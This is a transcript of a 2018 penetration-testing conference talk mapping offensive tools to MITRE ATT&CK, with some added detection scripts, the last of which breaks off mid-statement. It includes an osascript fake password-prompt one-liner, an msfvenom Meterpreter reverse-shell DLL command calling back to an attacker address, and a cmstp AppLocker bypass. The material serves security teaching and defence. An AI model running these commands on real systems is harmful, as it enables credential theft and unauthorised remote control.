Weapons of a Pentester - SecTor (transcript, 2019. 2. 11.)
www.AleksSecurity.com
Aleks Security Cyber Security Inc. www.AleksSecurity.com
2018 Oct
Understanding the virtual & physical tools used by white/black hat hackers
Weapons of a Pentester
PRESENTER: Nick Aleks
Disclaimer
This presentation is intended for professional SECTOR attendees and may contain information, content or opinions that could offend overly sensitive persons.
I will be showcasing and demoing tools that could be used to breach computers, networks, and security controls.
By no means am I endorsing the illegal use of these tools.
No individuals, equipment or animals were harmed while developing this presentation.
The thoughts and opinions within this presentation are my own. I speak for no one, no one speaks for me.
Nick Aleks
Penetration Tester;
From Toronto
DEFCON Toronto – DC416
https://www.meetup.com/DEFCON416
dc416.com
@Nick_Aleks
The History of this Presentation
The right tool – for the right job
Why have I given this talk for 3 years in a row?
- Sharing my knowledge as a pentester
- Meet amazing people in the industry
- Showing off some of the cool toys
- Tango with the demo gods
- Make hackers better
2018 Edition of this talk is a special one
In 2018 I stumbled upon something truly beautiful
However, I have slowly realized that this was more than just typically showing off some cool tools and how they may be used in your next engagement.
Previous talks in the past had little to no structure but now I wanted to completely reorganize my talk to fit the new trend taking our industry by storm.
The first tool I’ll be showing off to you all is….
MITRE ATT&CK Framework
What is MITRE ATT&CK?
What are we talking about today?
Adversarial Tactics, Techniques & Common Knowledge
A framework that breaks down complex POST-EXPLOIT cyber-attacks into individual units/blocks
Mapping to MITRE benefits:
- SIEM rules
- EDR detections
- APT Threat Intelligence
- Map to great pentests ☺
https://attack.mitre.org
[Figure: the ATT&CK matrix, Tactics as columns and Techniques as rows; the matrix goes on…]
What is MITRE ATT&CK?
What are we talking about today?
Tactics are divided into 11 categories, from Initial Access, Persistence and Lateral Movement to Collection and Exfiltration.
Within each of these Tactics we find a great number of Techniques.
https://attack.mitre.org
Example: Persistence Technique
Why map tools to the ATT&CK framework?
What are we talking about today?
5 great reasons:
- Use the right tool for the right job (if you're stuck trying to figure out a way to exfiltrate data)
- Gain a deeper understanding of the tools you already have (stop using your expensive tools for 1 task)
- Compare similar tools and improve PoC testing
- Fine-tune tools and better emulate APTs
- Identify gaps in current tooling capabilities (stuff the industry needs)
MITRE ATT&CK has literally become my north star/map on both the Red and the Blue team side of security.
A great community of infosec professionals has been doing some amazing things with the framework (google it).
I'm working on some amazing non-pentest-engagement-related projects regarding this framework.
So stay tuned.. ☺
What is a tool?
What a tool is in regards to this talk
Nick's definition:
“Something that helps you get the job done and/or teaches you how to get the job done.”
This can include:
- Physical equipment
- Frameworks
- Software
- Mobile apps
- Widgets/plugins
- Books/guides
- YouTube videos/talks
- Websites
- Commands
- Phrases, emails, speaking scripts and personas & clothing (social engineering)
Lock picking
Not really mapped to MITRE
“Initial Access” - Tactic
“Physical Security Compromise”
The Art of picking
How does one pick a lock?
A tension wrench (or torque wrench) is used to apply a torque to the cylinder, while a lock pick (or picklock) is used to push individual pins up until they are flush with the shear line.
Raking or scrubbing a pin tumbler lock is usually done before individual pins are pushed up. While applying torque with the tension wrench, a lock pick with a wide tip is placed at the back of the lock and quickly slid outwards with upward pressure so all the pins are pushed up.
Snap gun
The automated lock picking gun
How does it work?
The snap gun strikes all of the bottom pins at once with a strong impact, and then withdraws again. The bottom pins transfer their kinetic energy to the top pins and come to a complete stop without penetrating the lock housing.
How long does it take?
10-30 sec
https://www.sparrowslockpicks.ca/
Lock picking gear
A great place to pick up your gear
https://www.sparrowslockpicks.ca/
• Dimple Picks
• DIY PICKS
• New Stuff
• Blade Magazine Halo Points
• Lock Pick sets Beginner
• Lock Pick sets Advanced
• Euro Lock Pick Sets
• Military Lock Picks
• The MONSTRUM
• VORAX
• Hooks & Rakes lock pick sets
• Warded picks and wafer lock picks
• Snap Gun
• ByPass Drivers
• ByPass Tools
• Sparrows Jim
• Padlock Shims
• Practice Locks
• Cut Away Locks
• UNCUFF LINK cufflink
• Handcuff Key
• Elevator Key Set
• Bump Keys
• Lock Busters
• Pinning Mat
• Pinning Tweezers
• Cases
• Tension wrenches
• Sparrows Lock Pick Reviews
• Single Picks
Initial Access
Drive-by Compromise Tools
T1189
Browser Exploitation Framework - BeEF
T1189 Drive-by Compromise
BeEF is short for The Browser Exploitation Framework.
- It is a penetration testing tool that focuses on the web browser.
- Simulates web-borne attacks against clients, including mobile clients.
- Client-side attack vectors.
- Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser.
How it works?
T1189 Drive-by Compromise
https://beefproject.com/
BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Other Drive-by Compromise/Webapp Hacking Tools
T1189 Honorable mentions
Tool | Description | URL
Python Webserver | Simple webserver you can host on an attacker machine that will allow you to host a malicious payload that can be downloaded by the victim | https://docs.python.org/2/library/simplehttpserver.html
Software: XSSer | Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. | https://xsser.03c8.net/
Software: Burp Suite | Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. | http://portswigger.net/burp/
Software: DirBuster | DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers. | https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Blog: Side-channel attacking browsers through CSS3 features | With the staggering amount of features that were introduced through HTML5 and CSS3, the attack surface of browsers grew accordingly. | https://www.evonide.com/side-channel-attacking-browsers-through-css3-features/
Initial Access
Hardware Addition Tools
T1200
I’m in.
T1200 Hardware Addition Tools
What is this little USB?
Computer accessories, computers or networking hardware may be introduced into a system as a vector to gain execution.
While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access.
Commercial and open source products are leveraged with capabilities such as:
- Passive network tapping
- Man-in-the-middle
- Keystroke injection
- Kernel memory reading
- Wireless access to a network
- And the list goes on…
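A host-side check for this tactic, as an added example (it is not a tool from the talk): it parses a few constructed Linux kernel log lines of the kind written when a USB device enumerates and flags any device that registers as a network interface or a keyboard and is not on a site allowlist. The vendor/product IDs, product names, port paths and the allowlist are all constructed for the example. A purely passive inline device that passes the original keyboard through gives this check little to see, so physical inspection of ports stays part of the control.

```python
"""Flag USB devices that enumerate as network interfaces or keyboards (T1200).

Added example for this transcript, not a tool from the talk. All sample log
lines, vendor/product IDs and the allowlist below are constructed.
"""
import re
from typing import Dict, List, Set

# Constructed dmesg-style lines in the shape the Linux kernel uses for USB
# enumeration; the IDs and product names are illustrative, not real devices.
SAMPLE_DMESG = """\
usb 1-1: New USB device found, idVendor=aaaa, idProduct=0001, bcdDevice= 1.00
usb 1-1: Product: Wireless Mouse
input: Wireless Mouse as /devices/pci0000:00/usb1/1-1/1-1:1.0/input/input5
usb 1-2: New USB device found, idVendor=bbbb, idProduct=0002, bcdDevice= 1.00
usb 1-2: Product: USB 10/100 LAN
cdc_ether 1-2:1.0 usb0: register 'cdc_ether' at usb-0000:00:14.0-2, CDC Ethernet Device
usb 1-3: New USB device found, idVendor=cccc, idProduct=0003, bcdDevice= 1.00
usb 1-3: Product: Keyboard
input: Keyboard as /devices/pci0000:00/usb1/1-3/1-3:1.0/input/input6
hid-generic 0003:CCCC:0003.0004: input,hidraw0: USB HID v1.11 Keyboard [Keyboard] on usb-0000:00:14.0-3/input0
"""

# Constructed site allowlist of issued devices, as "idVendor:idProduct".
ALLOWLIST: Set[str] = {"aaaa:0001"}

NEW_DEV = re.compile(
    r"^usb (?P<dev>[\d.-]+): New USB device found, "
    r"idVendor=(?P<vid>[0-9a-f]{4}), idProduct=(?P<pid>[0-9a-f]{4})"
)
PRODUCT = re.compile(r"^usb (?P<dev>[\d.-]+): Product: (?P<name>.+)$")
# A class driver registering a network interface on one of the device's interfaces.
NETIF = re.compile(r"^\S+ (?P<dev>[\d.-]+):[\d.]+ (?P<ifname>\w+): register ")
# The HID layer reporting a keyboard; it names only the port path after the
# host controller, while the device lines carry "<bus>-<portpath>".
HID_KBD = re.compile(
    r"^hid-generic \S+: input,\S+: USB HID v[\d.]+ Keyboard \[[^\]]*\] "
    r"on usb-\S+?-(?P<port>[\d.]+)/input\d+$"
)


def parse_usb_events(log: str) -> Dict[str, dict]:
    """Return {device path: {"id", "product", "roles"}} from kernel log lines."""
    devices: Dict[str, dict] = {}
    for line in log.splitlines():
        if m := NEW_DEV.match(line):
            devices[m["dev"]] = {"id": f"{m['vid']}:{m['pid']}", "product": "", "roles": set()}
        elif (m := PRODUCT.match(line)) and m["dev"] in devices:
            devices[m["dev"]]["product"] = m["name"]
        elif (m := NETIF.match(line)) and m["dev"] in devices:
            devices[m["dev"]]["roles"].add("network")
        elif m := HID_KBD.match(line):
            # Correlate the controller-relative port path with "<bus>-<portpath>".
            for path, dev in devices.items():
                if path.endswith("-" + m["port"]):
                    dev["roles"].add("keyboard")
    return devices


def suspicious_additions(log: str, allowlist: Set[str] = ALLOWLIST) -> List[str]:
    """List devices that act as a NIC or keyboard and are not on the allowlist."""
    findings = []
    for path, dev in parse_usb_events(log).items():
        risky = dev["roles"] & {"network", "keyboard"}
        if risky and dev["id"] not in allowlist:
            findings.append(f"{path} {dev['id']} '{dev['product']}' roles={sorted(risky)}")
    return findings


if __name__ == "__main__":
    for finding in suspicious_additions(SAMPLE_DMESG):
        print("hardware addition candidate:", finding)
```

On the constructed log the unknown Ethernet adapter and the unknown keyboard are reported while the allowlisted mouse is not; feeding it a real `dmesg` or journal extract is the intended use, with the allowlist maintained from the asset inventory.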
The LAN Turtle
What is this little USB?
The LAN Turtle is a covert systems administration and penetration testing tool.
It is a stealth remote access, network intelligence gathering and man-in-the-middle device. Housed within a generic “USB Ethernet Adapter” case, the LAN Turtle's appearance allows it to blend into many environments.
Drop it on a LAN and access it from anywhere via SSH, Meterpreter and OpenVPN.
The Keygrabber Keylogger
What is this little USB device?
Pros:
- Inline hardware-based keystroke recorder
- Plugs into the computer's USB port and the keyboard's USB plugs into it (literally plug-n-play)
- 8GB encrypted memory
- Windows/Linux/Mac (no driver)
Cons:
- Requires physical access to retrieve keystroke contents
- Only works best on the back of desktop towers/docking stations
- Doesn't really work on laptops
http://www.keelog.com
The AirDrive Keylogger
Wifi-enabled keystroke-streaming keylogger
Pros:
- Wifi hotspot/device that is easily connected to by the attacking computer
- Plugs into the computer's USB port and the keyboard's USB plugs into it (literally plug-n-play)
- Access data from a web browser
- Can send email reports with data
- Time stamping
- Live-streaming
Cons:
- Only works best on the back of desktop towers/docking stations
- Doesn't really work on laptops
http://www.keelog.com
Keylogger Use Cases
Not just to extract passwords
Use cases:
- Profile employee/user behavior
- List most visited websites/servers/URLs
- Read emails before they are even sent
- Understand business processes and points of contact
- Extract IP (intellectual property)/code/configurations/IP addresses
- Extract chat/IM messages between employees
http://www.keelog.com
A great list of hardware addition tools (buy these in bulk)
A list of stuff you should buy in bulk, because you will lose some of them during engagements
Tool | Description | URL
Bash Bunny | USB gigabit Ethernet, serial, flash storage and keyboard emulator | https://www.hak5.org/shows/hak5-gear
USB Rubber Ducky | Keystroke injection tool disguised as a generic flash drive. | https://www.hak5.org/shows/hak5-gear
Packet Squirrel | Stealthy pocket-sized network man-in-the-middle device | https://www.hak5.org/shows/hak5-gear
LAN Turtle | USB Ethernet adapter backdoor and man-in-the-middle device | https://www.hak5.org/shows/hak5-gear
Keygrabber USB | In-line keylogger (keyboard keystroke recorder) | http://www.keelog.com/usb-keylogger/
Raspberry Pi 3 Model B+ | 64-bit quad-core processor, dual-band wireless LAN, Bluetooth 4.2/BLE, faster Ethernet, and Power-over-Ethernet mini-computer | https://www.raspberrypi.org
Arduino Uno Rev3/Nano (distraction/covert operations) | Programmable microcontroller board. It has 14 digital input/output pins (of which 6 can be used as PWM outputs), 6 analog inputs | https://store.arduino.cc/usa/arduino-uno-rev3
Initial Access
Spear-phishing Attachment/Link Tools
T1192/T1193
Social Engineering Toolkit (SET)
T1192/T1193 Spear-phishing attachment/link
Spear-phishing attack vector option built into SET
SET allows you to craft an attack, integrate with a mail provider (Gmail) and send a malicious payload (PDF) to the victim.
Allows you to create and save your own templates to use for future SE (social engineering) attacks
As easy as following the SET menu, or you can go ahead and create your own FileFormat payload
https://github.com/trustedsec/social-engineer-toolkit
Phishing Dark Waters
Blue team books help drive red team ideas
When it comes to spear-phishing your targets, it's great to have examples of known attacks.
Books like Phishing Dark Waters allow you to pick and choose the types of elements within a phishing campaign to include/not include.
There are a massive number of clues/hints employees have been trained to look out for before clicking links/attachments within emails.
Be sure to hold your spear-phishing to a quality assurance test by measuring against commonly known indicators of suspicious email.
Have a team mate or third-party review your spear-phish email before delivering it in order to remove any personal bias, human/logic errors.
T1194 - Spearphishing via Service Tools
How are they different?
• Spearphishing isn't just about clicking links or downloading attachments
• Spearphishing via service is a specific variant of spearphishing.
• It employs the use of third party services rather than directly via enterprise email channels.
• All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry.
• Adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.
• These services are more likely to have a less-strict security policy than an enterprise.
• Some of my fav tools combine the elements of social engineering & scripting/tech & hardware tooling
T1194 - Spearphishing via Wifi - Wifiphisher
T1194 – Spearphishing via Service Tool
Wifiphisher is a security tool that mounts automated phishing attacks against WiFi networks in order to obtain secret passphrases or other credentials. It is a social engineering attack that, unlike other methods, does not include any brute forcing.
Github: https://github.com/sophron/wifiphisher
Step 1: Victim becomes deauthenticated from their access point
Step 2: Victim joins a rogue access point
Step 3: Victim is served a realistic router-config-looking page
Step 4: Victim types password
The Requirements – x2 wireless cards
How can we start playing with wifiphisher
✓ Kali Linux
✓ Two wireless network cards
✓ Capable of injection/monitor mode
Needs TP-LINK TL-WN722N:
✓ 150 Mbps
✓ 4dBi detachable antenna
✓ $12 on Amazon
Wifiphisher – How it works
Take a look at wifiphisher
Jamming Interface
Router firmware upgrade
WPA2 Enterprise - Add a new form input (username)
Free Internet!
Mac OSX Wireless Networking Connection Spoofing
Spearphishing Tools
T1192/T1193 Spearphishing Attachment/Link Tools
Tool | Description | URL
Social Engineering Toolkit Manual | SET User Manual 6.0 by David Kennedy | https://github.com/trustedsec/social-engineer-toolkit
Phishing Dark Waters: The Offensive and Defensive Sides of Malicious Emails | An essential anti-phishing desk reference for anyone with an email address. Phishing Dark Waters addresses the growing and continuing scourge of phishing emails, and provides actionable defensive techniques and tools to help you steer clear of malicious emails. | https://www.amazon.ca/Phishing-Dark-Waters-Offensive-Defensive/dp/1118958470
Spear-Phishing With the Social Engineering Toolkit Tutorial | A tutorial outlining creating a spear-phishing attack, sending a malicious file through an email using SET | https://www.youtube.com/watch?v=5BY_vYOik_U
Wifiphisher Github Repo | Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks. | https://github.com/wifiphisher/wifiphisher
Execution
AppleScript
T1155
T1155 - AppleScript
Execution on Mac OSX computers via AppleScript
• macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC).
• These messages can be easily scripted with AppleScript for local or remote IPC.
• osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts.
• A list of OSA languages installed on a system can be found by using the osalang program.
• AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
• Adversaries can use this to:
– interact with open SSH connections
– move to remote machines
– present users with fake dialog boxes
T1155 – AppleScript Example
Execution on Mac OSX computers via AppleScript
A simple AppleScript Open Scripting Architecture (OSA) command that will prompt the user for a password in order to upgrade their current Mac operating system. The password is returned in plain text to stdout.
osascript -e 'display dialog "Required System Upgrade. Please enter passphrase." default answer "" with icon stop buttons {"Continue"} default button "Continue" with hidden answer'
AppleScript Tools
T1155 AppleScript Tools
Tool | Description | URL
Attack Mac OSX | Dan Tentler gave a talk at LayerOne 2016 | https://www.youtube.com/watch?v=buvhi77_MI4
Password Prompt | A simple AppleScript that will prompt the user for a password in order to upgrade their current Mac operating system. The password is returned in plain text to stdout. | https://gist.github.com/nicholasaleks/c272c2630791e612eca6bbf013b5bbf4
Learn AppleScript: The Comprehensive Guide to Scripting and Automation on Mac OS X, Edition 3 | Book | https://goo.gl/DpaUUa
AppleScript in a Nutshell: A Desktop Quick Reference | Book | https://goo.gl/GG5LVD
Execution
CMSTP
T1191
T1191 CMSTP Tools
LOLBAS – living off the land binaries and scripts
Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.
Trusted built-in Windows binary
- Not only an execution tactic but also:
- Defence evasion
- Persistence
It accepts an installation file (INF) and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with infected INF files to load and execute DLLs and/or COM scriptlets (SCT).
T1191 CMSTP
Let's bypass AppLocker! Example by netbiosX (pentestlab.blog)
Good tutorial on using CMSTP to bypass AppLocker:
1. Generate DLL:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f dll -o /root/Desktop/pentestlab.dll
2. Generate malicious INF file which references your DLL
3. Execute: cmstp.exe /s cmstp.inf
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp/
CMSTP Tools
T1191 CMSTP Tools
Tool | Description | URL
Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 1/2) | Blog articles outlining how to create a malicious DLL and INF and execute cmstp.exe | https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ and https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
AppLocker Bypass – CMSTP | Blog article outlining how to create a malicious DLL and INF and execute cmstp.exe | https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp/
CMSTP Microsoft Doc | Windows IT Pro Center documentation: cmstp.exe [/nf] [/ni] [/ns] [/s] [/su] [/u] [Drive:][path]ServiceProfileFileName.inf | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
CMSTP.exe - remote SCT execution video | Nicky Tyrer, Jan 30, 2018: CMSTP.exe (Microsoft Connection Manager Profile Installer) can invoke DllInstall from scrobj.dll. Therefore remote COM scriptlets can be executed. | https://www.youtube.com/watch?v=gzBBdoKv0OM
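The detection side of the two execution techniques above, the osascript password prompt (T1155) and the silent CMSTP profile install (T1191), as an added example that is not from the talk or the linked blogs: a small triage routine over process-creation events. The events are constructed; the rules assume that cmstp.exe's /s (silent) and /ni (no icon) switches from the Microsoft syntax line apply, that a Connection Manager profile normally lives under the Windows or Program Files directories (an assumption for the trusted-path list), and that the osascript case is recognisable by "display dialog" together with "hidden answer" on the command line, as in the slide's own one-liner.

```python
"""Triage process-creation events for CMSTP (T1191) and osascript (T1155) abuse.

Added example for this transcript, not a tool from the talk or the linked
blogs. The events below are constructed; the trusted INF directories are an
assumption about where legitimate profiles are installed from.
"""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcEvent:
    host: str
    image: str      # full path of the started executable
    cmdline: str    # command line as logged
    parent: str     # parent process image


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Windows\System32\cmstp.exe",
              r"cmstp.exe /s C:\Users\alice\AppData\Local\Temp\profile.inf",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("ws02", r"C:\Windows\System32\cmstp.exe",
              r'cmstp.exe /s "C:\Program Files\Corp VPN\corp.inf"',
              r"C:\Program Files\Corp VPN\setup.exe"),
    ProcEvent("mac01", "/usr/bin/osascript",
              "osascript -e 'display dialog \"Required System Upgrade. Please enter passphrase.\" "
              "default answer \"\" with icon stop buttons {\"Continue\"} with hidden answer'",
              "/bin/bash"),
    ProcEvent("mac02", "/usr/bin/osascript",
              "osascript -e 'tell application \"Finder\" to activate'",
              "/usr/bin/login"),
]

# Assumed directories where an installer legitimately keeps Connection Manager
# profiles; a profile installed from anywhere else is worth an analyst's look.
TRUSTED_INF_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# A quoted or bare argument ending in .inf.
INF_ARG = re.compile(r'"([^"]+?\.inf)"|(\S+\.inf)', re.IGNORECASE)


def cmstp_finding(ev: ProcEvent) -> Optional[str]:
    """Silent (/s) or no-icon (/ni) profile install from an untrusted INF path."""
    flags = {tok.lower() for tok in ev.cmdline.split() if tok.startswith("/")}
    inf_paths = [quoted or bare for quoted, bare in INF_ARG.findall(ev.cmdline)]
    untrusted = [p for p in inf_paths if not p.lower().startswith(TRUSTED_INF_DIRS)]
    if untrusted and flags & {"/s", "/ni"}:
        return f"T1191 cmstp.exe silent profile install from {untrusted[0]} (parent {ev.parent})"
    return None


def osascript_finding(ev: ProcEvent) -> Optional[str]:
    """Inline AppleScript that draws a dialog with a hidden (password) field."""
    cmd = ev.cmdline.lower()
    if "display dialog" in cmd and "hidden answer" in cmd:
        return f"T1155 osascript password-style dialog (parent {ev.parent})"
    return None


def triage(ev: ProcEvent) -> Optional[str]:
    """Dispatch on the image name; returns a finding string or None."""
    image = ev.image.lower().replace("\\", "/")
    if image.endswith("/cmstp.exe"):
        return cmstp_finding(ev)
    if image.endswith("/osascript"):
        return osascript_finding(ev)
    return None


def triage_all(events: List[ProcEvent]) -> List[str]:
    """Return 'host: finding' strings for every event a rule matched."""
    return [f"{ev.host}: {found}" for ev in events if (found := triage(ev))]


if __name__ == "__main__":
    for line in triage_all(SAMPLE_EVENTS):
        print(line)
```

The path rule is a triage heuristic rather than a verdict: the parent process and the INF contents decide the case, which is why both findings carry the parent image for the analyst.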
Execution
PowerShell Tools
T1086
T1086 - Empire
PowerShell/Python Post-exploitation Framework
• Empire is a post-exploitation framework that includes:
• a PowerShell 2.0 Windows agent,
• a Python 2.6/2.7 Linux/OS X agent.
• The framework is similar to Metasploit, however it has a dedicated focus on Windows targets
• Great tool for not only execution but persistence and privilege escalation techniques
• 3 main components:
– A listener is a process which listens for a connection from the machine we are attacking. This helps Empire send the loot back to the attacker's computer.
– A stager is a snippet of code that allows malicious code to be run via the agent on the compromised host.
– An agent is a program that maintains a connection between your computer and the compromised host.
– Check out Empire and learn more at: https://github.com/EmpireProject/Empire/wiki/Quickstart
T1086 - PowerSploit
PowerShell Tool
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following script categories:
• CodeExecution
• ScriptModification
• Persistence
• AntivirusBypass
• Exfiltration
• Mayhem
• Privesc
• Recon
https://github.com/PowerShellMafia/PowerSploit
T1086 – Atomic Red Team
PowerShell Based Attacks
A great tool not only for executing PowerShell attacks but also other MITRE ATT&CK techniques.
Pros:
- Simple one-liner attacks
- Fairly good coverage (not 100%)
- Easy to use
- Good community support/contribution
Cons:
- No built in validation or clean up scripts
PowerShell Tools
T1086 PowerShell Tools
Tool | Description | URL
Fileless PowerShell Attack | A brief demonstration of Cybereason blocking a fileless PowerShell-based attack | https://www.youtube.com/watch?v=Hc7h-rIyd5A
Windows PowerShell Cookbook | The Complete Guide to Scripting Microsoft's Command Shell | https://goo.gl/qnYpPb
Byt3bl33d3r Blog (byte bleeder) | Great blog that posts on Python scripted tools from the byt3bl33d3r GitHub repo | https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html
Atomic Red Team T1086 – PowerShell Attacks | Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks. | https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1086/T1086.md
PSAttack | A portable console aimed at making pentesting with PowerShell a little easier. | https://github.com/jaredhaight/PSAttack
Discovery
Systems Network Connections Discovery
T1049
T1049 - G-MoN
Wireless Network Mapping Application
Powerful WarDriving scanner and GSM / CDMA / EVDO / UMTS and LTE Netmonitor and drive test tool with voice notifications.
It scans for all WiFi networks in range & saves the data with GPS coordinates into a file on your SD card.
You can create a KML file for Google Earth. It shows you the encryption, channel and signal strength. It shows all APs in range in a live map.
https://play.google.com/store/apps/details?id=de.carknue.gmon2&hl=en
NooElec NESDR Mini USB RTL-SDR
SDR = Software Defined Radio
What is it?
USB Software Defined Radio. Used to listen to radio frequencies and display their outputs on your computer
Capabilities?
- ADS-B (automatic dependent surveillance broadcast)
- Police & fire scanning
- Trucking
- Car FOB scanning
- Garage door scanning
- Gate entry scanning
- Satellite images - https://www.rtl-sdr.com/rtl-sdr-tutorial-receiving-noaa-weather-satellite-images/
- Personally I feel like this little guy out-performs devices x10 its cost
GQRX
SDR = Software Defined Radio
What is it?
Supports SDR hardware such as HackRF, Airspy, Funcube Dongles, etc.
Capabilities?
- Discover connected radio devices
- Process I/Q data from devices
- Change frequency gain and apply various corrections
- Mono/stereo demodulators
- Record and playback audio/raw baseband
- Spectrum analyser mode
http://gqrx.dk/
YARD Stick One
Sub-1GHz RF transmitter & receiver
What is it?
Yet Another Radio Dongle can transmit and receive digital wireless signals at frequencies below 1 GHz.
How does it work?
YARD Stick One comes with RfCat firmware installed. RfCat allows you to interactively control the dongle with a Python shell.
Capabilities?
- Half-duplex transmit and receive
- Modulations: ASK, OOK, GFSK, 2-FSK, 4-FSK, MSK
- Data rates up to 500kbps
- Full-speed USB 2.0
Some Radio Operated Security Controls
Doors, Gates, Barriers, Cars
What I hacked last year
RF Lamp
Command & Control
Commonly Used Ports
T1043
T1043 - dnscat2
Encrypted data exfiltration and C2
Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection.
This tool is designed to create an encrypted Command and Control (C2) channel over the DNS protocol, which is an effective tunnel out of almost every network.
C2 and exfiltration over DNS provide a great mechanism to hide your traffic, evade network sensors, and get around network restrictions.
https://github.com/iagox86/dnscat2
T1043 - dnscat2 – How does it work?
Encrypted data exfiltration and C2
- Two sides (client & server side)
- Client is C based and runs on minimal dependencies
- Server is Ruby based and requires a few gem dependencies
- When you run the client you specify a domain name
- All requests will be sent to the local DNS server, which will redirect them to the authoritative DNS server (which you own)
- If you don't have the authoritative DNS server you can run direct UDP/53 (which will probably get caught by firewall/network monitoring pretty easily)
- Great for tunneling any data from client to server with no protocol, upload/download files, shells, etc.
- Also, it's encrypted by default
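What the blue team sees of this channel, as an added example that is not part of dnscat2 or the talk: because every tunnelled packet has to travel inside a query name under the domain the attacker controls, the resolver logs show many distinct, high-entropy subdomains under one registered domain, which normal browsing never produces. The block below reads constructed query-log lines in an assumed "<timestamp> <client> <qname> <qtype>" layout (the domains, client address and hex-looking labels are made up) and scores each registered domain on distinct-subdomain count and mean label entropy; it also counts TXT/CNAME/MX queries, the record types that carry the most data per reply. The last-two-labels rule for the registered domain is a simplification noted in the code.

```python
"""Spot DNS-tunnel-shaped query traffic such as dnscat2 produces (T1043).

Added example for this transcript, not part of dnscat2 or the talk. Input
lines are assumed to be "<timestamp> <client> <qname> <qtype>"; the log
below is constructed.
"""
import math
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Constructed query log. The hex-looking labels imitate encoded payload in
# tunnel query names; the domains and client address are made up.
SAMPLE_DNS_LOG = """\
2018-10-01T10:00:01 10.1.2.3 www.example.com A
2018-10-01T10:00:02 10.1.2.3 mail.example.com MX
2018-10-01T10:00:03 10.1.2.3 cdn.example.com A
2018-10-01T10:00:04 10.1.2.3 3f9a1c5e7b2d4086fa13c9e7.t.tunnel-example.net TXT
2018-10-01T10:00:04 10.1.2.3 a8d24e0f6c1b93d57e2f84ab.t.tunnel-example.net TXT
2018-10-01T10:00:05 10.1.2.3 71c3e5b9d02f8a64ec1b7d39.t.tunnel-example.net TXT
2018-10-01T10:00:05 10.1.2.3 e6b0f39c2a5d7184b3c6e9f0.t.tunnel-example.net TXT
2018-10-01T10:00:06 10.1.2.3 08d7a2c4f13e6b95d8a0c3e1.t.tunnel-example.net TXT
2018-10-01T10:00:06 10.1.2.3 b52e9c7a4d1f086e3c7b5a2d.t.tunnel-example.net TXT
2018-10-01T10:00:07 10.1.2.3 www.example.com A
"""

TUNNEL_QTYPES = {"TXT", "CNAME", "MX"}  # record types that carry the most data per reply


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0 for empty or single-symbol input)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_name(qname: str) -> Tuple[str, str]:
    """(registered domain, subdomain); the registered domain is approximated
    as the last two labels, which is wrong for suffixes like co.uk."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def domain_stats(log: str) -> Dict[str, dict]:
    """Per registered domain: query count, distinct subdomains, entropy sum, bulk qtypes."""
    stats = defaultdict(lambda: {"queries": 0, "unique": set(), "entropy_sum": 0.0, "bulk_qtypes": 0})
    for line in log.splitlines():
        if not line.strip():
            continue
        _ts, _client, qname, qtype = line.split()
        base, sub = split_name(qname)
        s = stats[base]
        s["queries"] += 1
        s["unique"].add(sub)
        s["entropy_sum"] += shannon_entropy(sub.replace(".", ""))
        if qtype.upper() in TUNNEL_QTYPES:
            s["bulk_qtypes"] += 1
    return stats


def suspicious_domains(log: str, min_unique: int = 5, min_entropy: float = 3.0) -> List[str]:
    """Domains with many distinct, high-entropy subdomains; thresholds are starting points
    to tune against a site's own baseline (CDNs and some telemetry also look busy)."""
    flagged = []
    for base, s in domain_stats(log).items():
        mean_entropy = s["entropy_sum"] / s["queries"]
        if len(s["unique"]) >= min_unique and mean_entropy >= min_entropy:
            flagged.append(base)
    return sorted(flagged)


if __name__ == "__main__":
    for base, s in domain_stats(SAMPLE_DNS_LOG).items():
        print(f"{base}: {s['queries']} queries, {len(s['unique'])} unique subdomains, "
              f"mean entropy {s['entropy_sum'] / s['queries']:.2f}, "
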